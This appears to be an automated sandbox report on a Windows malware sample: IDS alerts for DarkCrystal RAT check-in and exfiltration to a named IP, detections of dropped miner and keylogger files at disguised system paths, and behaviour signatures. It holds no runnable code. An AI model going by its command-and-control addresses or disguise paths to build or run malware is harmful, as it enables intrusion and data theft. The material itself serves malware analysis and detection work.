Source Port:	56268
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:56.774757+0200
SID:	2803305
Severity:	3
Source Port:	56272
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:50.764954+0200
SID:	2803305
Severity:	3
Source Port:	56202
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:45.112513+0200
SID:	2803305
Severity:	3
Source Port:	56258
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:35.510879+0200
SID:	2803305
Severity:	3
Source Port:	56248
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:32.782379+0200
SID:	2803305
Severity:	3
Source Port:	56246
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:45.112673+0200
SID:	2803305
Severity:	3
Source Port:	56257
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:52:00.467486+0200
SID:	2803305
Severity:	3
Source Port:	56276
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:54.896512+0200
SID:	2803305
Severity:	3
Source Port:	56270
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:11.390076+0200
SID:	2803305
Severity:	3
Source Port:	56218
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:41.187569+0200
SID:	2803305
Severity:	3
Source Port:	56254
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:53.030573+0200
SID:	2803305
Severity:	3
Source Port:	56267
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:58.121696+0200
SID:	2803305
Severity:	3
Source Port:	56207
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:54.409262+0200
SID:	2803305
Severity:	3
Source Port:	56204
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:03.729587+0200
SID:	2803305
Severity:	3
Source Port:	56210
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:15.526223+0200
SID:	2803305
Severity:	3
Source Port:	56221
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:39.297396+0200
SID:	2803305
Severity:	3
Source Port:	56251
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:56.250795+0200
SID:	2803305
Severity:	3
Source Port:	56206
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:52:02.318988+0200
SID:	2803305
Severity:	3
Source Port:	56277
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:07.513636+0200
SID:	2803305
Severity:	3
Source Port:	56212
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:23.089511+0200
SID:	2803305
Severity:	3
Source Port:	56233
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:19.383006+0200
SID:	2803305
Severity:	3
Source Port:	56226
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:43.332169+0200
SID:	2803305
Severity:	3
Source Port:	56255
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:37.420325+0200
SID:	2803305
Severity:	3
Source Port:	56249
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:35.514201+0200
SID:	2803305
Severity:	3
Source Port:	56247
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:01.876163+0200
SID:	2803305
Severity:	3
Source Port:	56209
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:51.164759+0200
SID:	2803305
Severity:	3
Source Port:	56265
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:48.958034+0200
SID:	2803305
Severity:	3
Source Port:	56261
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:39.303186+0200
SID:	2803305
Severity:	3
Source Port:	56252
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:30.754642+0200
SID:	2803305
Severity:	3
Source Port:	56243
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:17.524807+0200
SID:	2803305
Severity:	3
Source Port:	56223
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:47.073504+0200
SID:	2803305
Severity:	3
Source Port:	56259
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:41.747464+0200
SID:	2803305
Severity:	3
Source Port:	56194
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:28.872233+0200
SID:	2803305
Severity:	3
Source Port:	56241
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:37.402996+0200
SID:	2803305
Severity:	3
Source Port:	56250
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:25.163311+0200
SID:	2803305
Severity:	3
Source Port:	56237
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:21.247470+0200
SID:	2803305
Severity:	3
Source Port:	56231
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) - Source IP: 192.168.2.5 - Destination IP: 194.58.42.154

Timestamp:	2024-09-02T16:51:21.414649+0200
SID:	2048130
Severity:	1
Source Port:	56199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:59.980991+0200
SID:	2803305
Severity:	3
Source Port:	56208
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:21.242886+0200
SID:	2803305
Severity:	3
Source Port:	56230
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:48.689775+0200
SID:	2803305
Severity:	3
Source Port:	56200
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:47.091136+0200
SID:	2803305
Severity:	3
Source Port:	56260
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) - Source IP: 192.168.2.5 - Destination IP: 194.58.42.154

Timestamp:	2024-09-02T16:50:47.432132+0200
SID:	2048095
Severity:	1
Source Port:	56199
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:09.495635+0200
SID:	2803305
Severity:	3
Source Port:	56213
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:50:45.948094+0200
SID:	2803305
Severity:	3
Source Port:	56197
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:51.163629+0200
SID:	2803305
Severity:	3
Source Port:	56264
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:48.971331+0200
SID:	2803305
Severity:	3
Source Port:	56262
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:58.551326+0200
SID:	2803305
Severity:	3
Source Port:	56273
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:52:02.319111+0200
SID:	2803305
Severity:	3
Source Port:	56278
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

ETPRO MALWARE Common Downloader Header Pattern H - Source IP: 192.168.2.5 - Destination IP: 149.154.167.220

Timestamp:	2024-09-02T16:51:41.151295+0200
SID:	2803305
Severity:	3
Source Port:	56253
Destination Port:	443
Protocol:	TCP
Classtype:	Unknown Traffic

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\setup.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\Program Files\Google\Chrome\updater.exe	Avira: detection malicious, Label: TR/CoinMiner.lnxah
Source: C:\ProgramData\main.exe	Avira: detection malicious, Label: TR/Spy.KeyLogger.kapbl
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342
Source: C:\ProgramData\svchost.exe	Avira: detection malicious, Label: VBS/Runner.VPG
Source: C:\Users\user\3D Objects\tasklist.exe	Avira: detection malicious, Label: HEUR/AGEN.1323342

Multi AV Scanner detection for dropped file

Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	ReversingLabs: Detection: 73%
Source: C:\Program Files\Google\Chrome\updater.exe	ReversingLabs: Detection: 87%
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	ReversingLabs: Detection: 73%
Source: C:\ProgramData\Microsoft\based.exe	ReversingLabs: Detection: 58%
Source: C:\ProgramData\Microsoft\hacn.exe	ReversingLabs: Detection: 70%
Source: C:\ProgramData\main.exe	ReversingLabs: Detection: 91%
Source: C:\ProgramData\setup.exe	ReversingLabs: Detection: 87%
Source: C:\ProgramData\svchost.exe	ReversingLabs: Detection: 75%
Source: C:\Users\user\3D Objects\tasklist.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	ReversingLabs: Detection: 47%
Source: C:\Users\user\AppData\Local\Temp\_MEI75002\s.exe	ReversingLabs: Detection: 13%
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	ReversingLabs: Detection: 73%
Source: C:\Users\user\AppData\Local\Temp\wxyubnjmnlae.tmp	ReversingLabs: Detection: 91%
Source: C:\Users\user\AppData\Roaming\GoogleChromeUpdateLog\Update.exe	ReversingLabs: Detection: 91%
Source: C:\Users\user\Desktop\FjOAgEaQ.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\IibrXntG.log	ReversingLabs: Detection: 50%
Source: C:\Users\user\Desktop\NvkaspdC.log	ReversingLabs: Detection: 29%
Source: C:\Users\user\Desktop\etdFcppU.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\jXYEVzlL.log	ReversingLabs: Detection: 70%
Source: C:\Users\user\Desktop\texuZkSn.log	ReversingLabs: Detection: 20%
Source: C:\Users\user\Desktop\uLCuFLgt.log	ReversingLabs: Detection: 29%
Source: C:\Windows\Logs\SettingSync\cmd.exe	ReversingLabs: Detection: 73%
Source: C:\Windows\Resources\audiodg.exe	ReversingLabs: Detection: 73%

Multi AV Scanner detection for submitted file

Source: iqA8j9yGcd.exe

ReversingLabs: Detection: 50%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Machine Learning detection for dropped file

Source: C:\ProgramData\Microsoft\hacn.exe	Joe Sandbox ML: detected
Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\_MEI73082\Build.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\setup.exe	Joe Sandbox ML: detected
Source: C:\Program Files\Google\Chrome\updater.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\main.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Windows Photo Viewer\en-GB\biuvCXdylsCxguP.exe	Joe Sandbox ML: detected
Source: C:\ProgramData\svchost.exe	Joe Sandbox ML: detected
Source: C:\Users\user\3D Objects\tasklist.exe	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\ProgramData\setup.exe

Unpacked PE file: 20.2.setup.exe.11262380000.1.unpack

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\audiodg.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\42af1c969fbb7b

Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:56192 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56193 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56211 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:56217 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56222 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:56255 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:56266 version: TLS 1.2

Source: iqA8j9yGcd.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: Build.exe, 00000005.00000002.2039643071.0000000000456000.00000002.00000001.01000000.00000006.sdmp, Build.exe, 00000005.00000000.2023329973.0000000000456000.00000002.00000001.01000000.00000006.sdmp, s.exe, 0000000C.00000000.2060051193.0000000000EB3000.00000002.00000001.01000000.00000013.sdmp, s.exe, 0000000C.00000003.2070913256.0000000006B05000.00000004.00000020.00020000.00000000.sdmp, s.exe, 0000000C.00000002.2098083981.0000000000EB3000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000006.00000003.2053916994.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2817663620.00007FF8BA4F1000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000006.00000003.2054074407.00000246D4005000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2803790158.00007FF8A8180000.00000040.00000001.01000000.00000022.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000006.00000003.2038690656.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000009.00000002.2073061930.00007FF8B9F71000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000008.00000002.2816532697.00007FF8B93D0000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000006.00000003.2039194713.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2814776290.00007FF8B7E11000.00000040.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdbEE source: based.exe, 00000008.00000002.2813439502.00007FF8A9355000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PICOpenSSL 3.0.9 30 May 20233.0.9built on: Tue Jul 11 19:52:20 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC;CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL \|\| WITHIN_ARENA(temp->next)assertion failed: (char *)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) \|\| WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist != NULLassertion failed: sh.bittable != NULLassertion failed: sh.bitmalloc != NULLassertion failed: !sh_testbit(temp, slist, sh.bitmalloc)assertion failed: temp != sh.freelist[slist]assertion failed: sh.freelist[slist] == tempassertion failed: temp-(sh.arena_size >> slist) == sh_find_my_buddy(temp, slist)assertion failed: sh_testbit(chunk, list, sh.bittable)assertion failed: WITHIN_ARENA(chunk)assertion failed: sh_testbit(ptr, list, sh.bittable)assertion failed: ptr == sh_find_my_buddy(buddy, list)assertion failed: ptr != NULLassertion failed: !sh_testbit(ptr, list, sh.bitmalloc)assertion failed: sh.freelist[list] == ptr/0123456789ABCDEFCRYPTO_memdup..\s\crypto\o_str.chexstr2buf_sepossl_hexstr2buf_sepbuf2hexstr_sepossl_buf2hexstr_sep..\s\crypto\packet.cwpacket_intern_init_lenWPACKET_start_sub_packet_len__..\s\crypto\param_build.cparam_pushparam_push_numOSSL_PARAM_BLD_push_BN_padNegative big numbers are unsupported for OSSL_PARAMOSSL_PARAM_BLD_push_utf8_stringOSSL_PARAM_BLD_push_utf8_ptrOSSL_PARAM_BLD_push_octet_stringOSSL_PARAM_BLD_push_octet_ptrOSSL_PARAM_BLD_to_param..\s\crypto\params.c source: based.exe, 00000008.00000002.2804456470.00007FF8A8651000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbNN source: based.exe, 00000008.00000002.2816055518.00007FF8B8F8C000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC source: based.exe, based.exe, 00000008.00000002.2804456470.00007FF8A8651000.00000040.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000009.00000002.2070711669.00007FF8A882F000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: based.exe, 00000008.00000002.2816697386.00007FF8B9841000.00000040.00000001.01000000.00000021.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000006.00000003.2039389379.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2816055518.00007FF8B8F8C000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000006.00000003.2038837870.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2816935161.00007FF8B9F61000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: iqA8j9yGcd.exe, 00000000.00000003.2012424329.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp, based.exe, 00000007.00000003.2039323205.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2817349912.00007FF8BA251000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: iqA8j9yGcd.exe, 00000000.00000003.2012424329.000001609C9C0000.00000004.00000020.00020000.00000000.sdmp, iqA8j9yGcd.exe, 00000002.00000002.2032036869.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp, based.exe, 00000007.00000003.2039323205.0000020693470000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2817349912.00007FF8BA251000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000008.00000002.2805425038.00007FF8A87D1000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000006.00000003.2039565575.00000246D4004000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000008.00000002.2815402387.00007FF8B8B01000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000008.00000002.2815771454.00007FF8B8B21000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\a\1\b\libssl-3.pdb source: based.exe, 00000008.00000002.2813439502.00007FF8A9355000.00000040.00000001.01000000.0000001F.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python311.pdb source: based.exe, 00000008.00000002.2805857266.00007FF8A8CCB000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000008.00000002.2815095060.00007FF8B7E31000.00000040.00000001.01000000.0000001D.sdmp

Spreading

Infects executable files (exe, dll, sys, html)

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Windows\System32\SecurityHealthSystray.exe
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	System file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8D83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00007FF72B8D83C0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8D9280 FindFirstFileExW,FindClose,	0_2_00007FF72B8D9280
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 0_2_00007FF72B8F1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	0_2_00007FF72B8F1874
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8D9280 FindFirstFileExW,FindClose,	2_2_00007FF72B8D9280
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8D83C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF72B8D83C0
Source: C:\Users\user\Desktop\iqA8j9yGcd.exe	Code function: 2_2_00007FF72B8F1874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF72B8F1874
